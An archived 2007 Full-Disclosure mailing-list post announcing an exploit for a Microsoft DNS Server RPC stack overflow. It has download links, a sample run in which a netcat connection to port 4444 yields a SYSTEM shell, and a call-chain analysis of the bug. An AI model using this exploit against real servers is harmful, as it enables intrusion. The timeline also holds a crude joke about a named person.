| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <80321d330704151953m62709cb6j81d8952e46a59e9c@mail.gmail.com>
Date: Mon, 16 Apr 2007 04:53:27 +0200
From: "Andres Tarasco" <atarasco@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Microsoft DNS Server Remote Code execution
Exploit and analysis
Hi,
im sending you the headers of the new exploit code for microsoft DNS
servers. You can download the full source code exploit and analysis at:
- http://www.514.es/Microsoft_Dns_Server_Exploit.zip
or
- http://www.48bits.com/exploits/dnsxpl.rar
Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RPC api used)
Author:
* Mario Ballano ( mballano~gmail.com )
* Andres Tarasco ( atarasco~gmail.com )
Timeline:
* April,12,2007: Microsoft advisory published
* April,13,2007: POC Exploit coded
* April,14,2007: Microsoft notified about a new attack vector against port
445 (this exploit code)
* April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
* April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS
bypassed
* April,16,2007: hackers hax the w0rld and got busted.
* April,xx,2007: Lammer release the first buggy worm
* Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m.. being
abducted were found at NSA servers
Usage:
D:\DNSTEST>dnstest.exe 192.168.1.7
-------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
-------------------------------------------------------
[+] Trying to fingerprint target.. 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@...cn_np:
192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0x0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444
D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
nt authority\system
Vulnerability Analysis:
The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer
to convert
a string calling Name_ConvertFileNameToCountName(), this string can
contain back-slash
octal characters. Although some bounds checks are done when writting to
the buffer is
still possible to bypass them using a string with multiple backslashed
chars, resulting
in a stack based buffer overflow.
This function can be reached through DNS RPC Interface, the execution flow
will be as follows:
R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd); // RPC
Exported function
R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
Zone_FindZoneByName(buggybuffer); //
Here we go!
Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); //
Using fixed size local buffer
extractQuotedChar(x,x,buggybuffer); //
Extract octal number
Disassemblies at the end of the code:
References:
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of
Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
- www.48bits.com
- http://www.514.es
Just compile the code with nmake and have fun!
*/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists